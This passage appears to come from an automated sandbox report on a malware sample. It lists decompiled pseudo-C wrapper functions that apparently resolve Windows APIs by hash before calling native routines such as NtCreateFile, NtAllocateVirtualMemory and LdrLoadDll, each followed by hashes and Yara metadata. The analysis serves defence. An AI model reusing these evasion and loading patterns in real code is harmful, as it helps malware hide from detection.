                                      				_t15 = E0041CC50( &_v12, 0x104, _a8);
                                      				_t31 = _t30 + 0xc;
                                      				if(_t15 != 0) {
                                      					_t17 = E0041D070(_v8, _t24, __eflags, _v8);
                                      					_t32 = _t31 + 4;
                                      					__eflags = _t17;
                                      					if(_t17 != 0) {
                                      						E0041D2F0( &_v12, 0);
                                      						_t32 = _t32 + 8;
                                      					}
                                      					_t18 = E0041B4A0(_v8);
                                      					_v16 = _t18;
                                      					__eflags = _t18;
                                      					if(_t18 == 0) {
                                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                      						return _v16;
                                      					}
                                      					return _t18;
                                      				} else {
                                      					return _t15;
                                      				}
                                      			}

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                      • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                      • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                      • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                      				long _t21;
                                      				void* _t31;
                                      
                                      				_t3 = _a4 + 0xc40; // 0xc40
                                      				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                      				return _t21;
                                      			}

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 64%
                                      			E0041A35A(void* __eax, void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                      				long _t26;
                                      				void* _t37;
                                      
                                      				asm("scasb");
                                      				asm("aaa");
                                      				_t20 = _a4;
                                      				_t5 = _t20 + 0xc40; // 0xc40
                                      				E0041AF60(_t37, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                      				_t26 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                      				return _t26;
                                      			}

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 931a1fd33556899393102e116f90a739fe066eead889d2a52d463c25d15a1294
                                      • Instruction ID: 54a1b91e9f83a5620ee8a7ecbef602848a6f5ab7f6768b25ff6c4f72ddef8673
                                      • Opcode Fuzzy Hash: 931a1fd33556899393102e116f90a739fe066eead889d2a52d463c25d15a1294
                                      • Instruction Fuzzy Hash: 29F0C4B2214149AFCB18CF99D885CEB7BADFF8C314B15864DFA0C97212D634E855CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                      				long _t14;
                                      				void* _t21;
                                      
                                      				_t10 = _a4;
                                      				_t3 = _t10 + 0xc60; // 0xca0
                                      				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                      				return _t14;
                                      			}

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 82%
                                      			E0041A48A(void* __edx, intOrPtr _a4, void* _a8) {
                                      				void* _v117;
                                      				long _t9;
                                      				void* _t13;
                                      
                                      				_t6 = _a4;
                                      				_t3 = _t6 + 0x10; // 0x300
                                      				_push(0xf2d4f965);
                                      				_t4 = _t6 + 0xc50; // 0x40a943
                                      				E0041AF60(_t13, _a4, _t4,  *_t3, 0, 0x2c);
                                      				_t9 = NtClose(_a8); // executed
                                      				return _t9;
                                      			}

                                      APIs
                                      • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: e4ccdfe49ed4723dfd73aeb38c6be87cd567d25dafdd85b3661fc5b9a251620a
                                      • Instruction ID: aa8a558cec250baee65c92f12daa83648964882f436c66b8d7c05aaea01e5d9a
                                      • Opcode Fuzzy Hash: e4ccdfe49ed4723dfd73aeb38c6be87cd567d25dafdd85b3661fc5b9a251620a
                                      • Instruction Fuzzy Hash: 77E08671500214BFD710DB94CC45EDB7768EF48360F15406AB91CA7241C530A5008690
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A490(intOrPtr _a4, void* _a8) {
                                      				long _t8;
                                      				void* _t11;
                                      
                                      				_t5 = _a4;
                                      				_t2 = _t5 + 0x10; // 0x300
                                      				_t3 = _t5 + 0xc50; // 0x40a943
                                      				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                      				_t8 = NtClose(_a8); // executed
                                      				return _t8;
                                      			}

                                      APIs
                                      • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                      • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                      • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                      • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			E0041A662(void* __edx, void* _a3, long _a7, void* _a11) {
                                      				char _v1;
                                      				void* __ebp;
                                      				long _t7;
                                      				void* _t8;
                                      				void* _t9;
                                      				long _t11;
                                      
                                      				_push(0x2e83478);
                                      				_t11 = __edx + 1;
                                      				if(_t11 >= 0) {
                                      					_t8 = RtlAllocateHeap(_t9, _t7, _t11); // executed
                                      					return _t8;
                                      				} else {
                                      					asm("lds esi, [edx]");
                                      					__esi = 0x8b55d394;
                                      					__ebp = __esp;
                                      					__eax = _v1;
                                      					_t3 = __eax + 0xc74; // 0xc74
                                      					__esi = _t3;
                                      					__eax = E0041AF60(__edi, _v1, __esi,  *((intOrPtr*)(__eax + 0x10)), 0, 0x35);
                                      					__edx = _a11;
                                      					__eax = _a7;
                                      					__edx =  *__esi;
                                      					__eax = RtlFreeHeap(_a3, _a7, _a11); // executed
                                      					__esi = 0x8b55d394;
                                      					__ebp = __ebp;
                                      					return __eax;
                                      				}
                                      			}

                                      APIs
                                      • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                      • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateFree
                                      • String ID: 6EA
                                      • API String ID: 2488874121-1400015478
                                      • Opcode ID: 71c7088cf6bc23b96f580971d7f361d1decd71316cc3ed5d6009d06be1f2bd21
                                      • Instruction ID: c340780f08b8451111515dbcd8b1f231c7d4c204369fad4a53d0d12dcffe0823
                                      • Opcode Fuzzy Hash: 71c7088cf6bc23b96f580971d7f361d1decd71316cc3ed5d6009d06be1f2bd21
                                      • Instruction Fuzzy Hash: FFF0E2B22005046FEB14EF99CC45DE7736CEF98361F11858AF94C97240C231EC118AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                      				long _t9;
                                      				void* _t10;
                                      				void* _t12;
                                      				long _t13;
                                      				void* _t15;
                                      
                                      				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                      				_t13 = _a16;
                                      				_t9 = _a12;
                                      				_t6 =  &_a8; // 0x414536
                                      				_t12 =  *_t6;
                                      				_t10 = RtlAllocateHeap(_t12, _t9, _t13); // executed
                                      				return _t10;
                                      			}

                                      APIs
                                      • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: 6EA
                                      • API String ID: 1279760036-1400015478
                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 61%
                                      			E00408308(intOrPtr _a4, long _a8) {
                                      				char _v67;
                                      				char _v68;
                                      				void* _t12;
                                      				int _t13;
                                      				signed int _t15;
                                      				long _t21;
                                      				int _t26;
                                      				void* _t29;
                                      				void* _t31;
                                      				void* _t36;
                                      
                                      				_pop(_t20);
                                      				_push(0xce74cef3);
                                      				asm("adc [ebp-0x75], dl");
                                      				_t29 = _t31;
                                      				_v68 = 0;
                                      				E0041BE60( &_v67, 0, 0x3f);
                                      				E0041CA00( &_v68, 3);
                                      				_t12 = E0040ACF0(_t36, _a4 + 0x1c,  &_v68); // executed
                                      				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                      				_t26 = _t13;
                                      				if(_t26 != 0) {
                                      					_t21 = _a8;
                                      					_t13 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                      					_t38 = _t13;
                                      					if(_t13 == 0) {
                                      						_t15 = E0040A480(_t38, 1, 8) & 0x000000ff;
                                      						_t13 =  *_t26(_t21, 0x8003, _t29 + _t15 - 0x40, _t13);
                                      					}
                                      				}
                                      				return _t13;
                                      			}

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 6da4aff3f8700130538479ea939b3df12928e4deb9507837ad49f532943f4536
                                      • Instruction ID: eb1b710e1256d89ee1a10d32ec2b7c6c8a4d442da80d45c4cbe7d5cf8d833e99
                                      • Opcode Fuzzy Hash: 6da4aff3f8700130538479ea939b3df12928e4deb9507837ad49f532943f4536
                                      • Instruction Fuzzy Hash: 6801DD31A8032876E721A6559C43FFF6B2C5B40F54F04011DFF04BA1C1D6E8650547E5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 82%
                                      			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                                      				char _v67;
                                      				char _v68;
                                      				void* _t12;
                                      				intOrPtr* _t13;
                                      				int _t14;
                                      				signed int _t16;
                                      				long _t22;
                                      				intOrPtr* _t26;
                                      				void* _t27; // stack base used for the _t27 + _t16 - 0x40 buffer computation below
                                      				void* _t31;
                                      				void* _t33; // decompiler temporary, used but not declared in the raw listing
                                      
                                      				_t31 = __eflags;
                                      				_v68 = 0;
                                      				E0041BE60( &_v67, 0, 0x3f);
                                      				E0041CA00( &_v68, 3);
                                      				_t12 = E0040ACF0(_t31, _a4 + 0x1c,  &_v68); // executed
                                      				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6); // resolves an API by hash (0xc4e7b6d6)
                                      				_t26 = _t13;
                                      				if(_t26 != 0) {
                                      					_t22 = _a8;
                                      					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                                      					_t33 = _t14;
                                      					if(_t14 != 0) {
                                      						L4:
                                      						return _t14;
                                      					}
                                      					_t16 = E0040A480(_t33, 1, 8) & 0x000000ff;
                                      					_t14 =  *_t26(_t22, 0x8003, _t27 + _t16 - 0x40, _t14); // indirect call through the resolved pointer
                                      					goto L4;
                                      				}
                                      				return _t13;
                                      			}

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                      • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                      • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                      • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                      				intOrPtr _t3; // decompiler temporary, used but not declared in the raw listing
                                      				char _t10;
                                      				void* _t15;
                                      
                                      				_t3 = _a4 + 0xc74; // 0xc74
                                      				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                      				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                      				return _t10;
                                      			}

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                      				int _t10;
                                      				void* _t15;
                                      
                                      				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                      				return _t10;
                                      			}

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E0041A7CB(void* __eax, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                      				intOrPtr _t9; // decompiler temporary, used but not declared in the raw listing
                                      				int _t12;
                                      				void* _t17;
                                      
                                      				asm("rcr edi, 1"); // mid-function entry point, 5 bytes before E0041A7D0
                                      				_t9 = _a4;
                                      				E0041AF60(_t17, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t9 + 0xa18)), 0, 0x46);
                                      				_t12 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                      				return _t12;
                                      			}

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 9c07bfc3489df66701806d444057332a5a75b14aba097594b7f413c433a1b6f4
                                      • Instruction ID: ccfebadbf5ca5a47bf41ca1d97d0bf9e33208da564f49b8907ec872c7d477311
                                      • Opcode Fuzzy Hash: 9c07bfc3489df66701806d444057332a5a75b14aba097594b7f413c433a1b6f4
                                      • Instruction Fuzzy Hash: 46E0DFB12042446FDB10DF65DC85EDB3FA8EF84310F148699FC885B202C934E515CBB5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A6B0(intOrPtr _a4, int _a8) {
                                      				intOrPtr _t5; // decompiler temporary, used but not declared in the raw listing
                                      				void* _t10;
                                      
                                      				_t5 = _a4;
                                      				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                      				ExitProcess(_a8); // does not return
                                      			}

                                      APIs
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID:
                                      • API String ID: 621844428-0
                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Executed Functions

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,04D74BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04D74BB7,007A002E,00000000,00000060,00000000,00000000), ref: 04D7A3AD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction ID: f156d521ce954e1aa65f7c0b29923461c22e0251e78c5b216ef096aacb7a9e3e
                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction Fuzzy Hash: 31F0BDB2200208ABCB08CF88DC84EEB77ADEF8C754F158248FA0D97240D630F8118BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,04D74BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04D74BB7,007A002E,00000000,00000060,00000000,00000000), ref: 04D7A3AD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 6390ce6fe18e55d88cde4709e75a68668ef7b31667bb57ee2501f5038f79fcef
                                      • Instruction ID: 845c7c2eb287f8ad0193274765676236795de16ff9ebb68a2e0b28309987cbdf
                                      • Opcode Fuzzy Hash: 6390ce6fe18e55d88cde4709e75a68668ef7b31667bb57ee2501f5038f79fcef
                                      • Instruction Fuzzy Hash: C9F0C4B2214149AFCB18CF98D884CEB7BADFF8C314B15864DFA0C97212D634E855CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtReadFile.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(04D74D72,5EB65239,FFFFFFFF,04D74A31,?,?,04D74D72,?,04D74A31,FFFFFFFF,5EB65239,04D74D72,?,00000000), ref: 04D7A455
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: C0000.00000040.00000001File.00000009.00000002.932154419.00000000050Read
                                      • String ID:
                                      • API String ID: 718190075-0
                                      • Opcode ID: a7d956f5fee2acbb4b54a922dcdb4dba2611aa15aac4643ed0cc73a3f7340144
                                      • Instruction ID: 1a184b922e4151f8492b2150352e7f4437e9d15bf4c67f393d36e76a3bbb7569
                                      • Opcode Fuzzy Hash: a7d956f5fee2acbb4b54a922dcdb4dba2611aa15aac4643ed0cc73a3f7340144
                                      • Instruction Fuzzy Hash: B7F0A4B2204118AFDB14DF89DC94EEB77ADEF8C754F168249FA1D97241D630E9118BE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtReadFile.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(04D74D72,5EB65239,FFFFFFFF,04D74A31,?,?,04D74D72,?,04D74A31,FFFFFFFF,5EB65239,04D74D72,?,00000000), ref: 04D7A455
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: C0000.00000040.00000001File.00000009.00000002.932154419.00000000050Read
                                      • String ID:
                                      • API String ID: 718190075-0
                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction ID: 5dfe14ba57cb1299ca002df5a53283ab4c0d2b662653d1b2f91ac1e65150223e
                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction Fuzzy Hash: 46F0A4B2200208ABDB14DF89DC80EEB77ADEF8C754F158249BA1D97241D630E8118BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtAllocateVirtualMemory.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(00000004,00003000,00002000,00000000,?,04D62D11,00002000,00003000,00000004), ref: 04D7A579
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateC0000.00000040.00000001Memory.00000009.00000002.932154419.00000000050Virtual
                                      • String ID:
                                      • API String ID: 2792403363-0
                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction ID: 6345e0131c47c02dd8f15169552d080d7de40241c0b2ab01464528130fc5a434
                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction Fuzzy Hash: 9FF015B2200208ABDB14DF89CC80EAB77ADEF88654F118149FE0897241C630F810CBB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtClose.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(04D74D50,?,?,04D74D50,00000000,FFFFFFFF), ref: 04D7A4B5
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: C0000.00000040.00000001Close.00000009.00000002.932154419.00000000050
                                      • String ID:
                                      • API String ID: 2580148879-0
                                      • Opcode ID: 4c55b76d9472388b35d5cdb612d7a17890d357038eaa6c73f301fa19f0645f09
                                      • Instruction ID: 11de9b9e70f7604c4ea86bb31e8b9ce9b61583ae3bdeef28598d70c90364afa0
                                      • Opcode Fuzzy Hash: 4c55b76d9472388b35d5cdb612d7a17890d357038eaa6c73f301fa19f0645f09
                                      • Instruction Fuzzy Hash: 7BE08671600214BFD710DB94CC44EDB7768EF44350F15406AF918A7341C530A5008690
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
